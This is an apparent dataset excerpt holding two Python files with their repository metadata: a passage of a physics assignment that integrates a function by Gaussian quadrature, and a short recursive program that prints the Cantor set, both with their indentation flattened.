for k in range(1,N):
p0,p1 = p1,((2*k+1)*x*p1-k*p0)/(k+1)
dp = (N+1)*(p0-x*p1)/(1-x*x)
dx = p1/dp
x -= dx
delta = max(abs(dx))
# Calculate the weights
w = 2*(N+1)*(N+1)/(N*N*(1-x*x)*dp*dp)
return x,w
def gaussxwab(N,a,b):
x,w = gaussxw(N)
return 0.5*(b-a)*x+0.5*(b+a),0.5*(b-a)*w
def f(z):
if z<1.0e-4:
return z**2+7*z**3/2.0+91*z**4/12+13*z**5+13859*z**6/720+2309*z**7/90
else:
return z**3.0/((1.0-z)**5.0*(exp(z/(1-z))-1))
N=30
a=0.0
b=1.0
x,w=gaussxwab(N,a,b)
s=0.0
for k in range(N):
s+=w[k]*f(x[k])
print("Value of integral is {0:.3f}".format(s))
#########################################################################
# OUTPUT OF PROGRAM (value of integral)
# Value of integral is 6.493947736403491
#
| cklanger/Assignment_5 | Langer_problem3.py | Langer_problem3.py | py | 1,713 | python | en | code | 0 | github-code | 90 |
20767418531 | import sys
input = sys.stdin.readline
def cantor(length):
if length == 1:
return '-'
lines = cantor(length // 3)
blank = ' ' * (length // 3)
return lines + blank + lines
if __name__ == '__main__':
while True:
try:
N = int(input())
print(cantor(3**N))
except:
break | feVeRin/Algorithm | problems/4779.py | 4779.py | py | 348 | python | en | code | 0 | github-code | 90 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.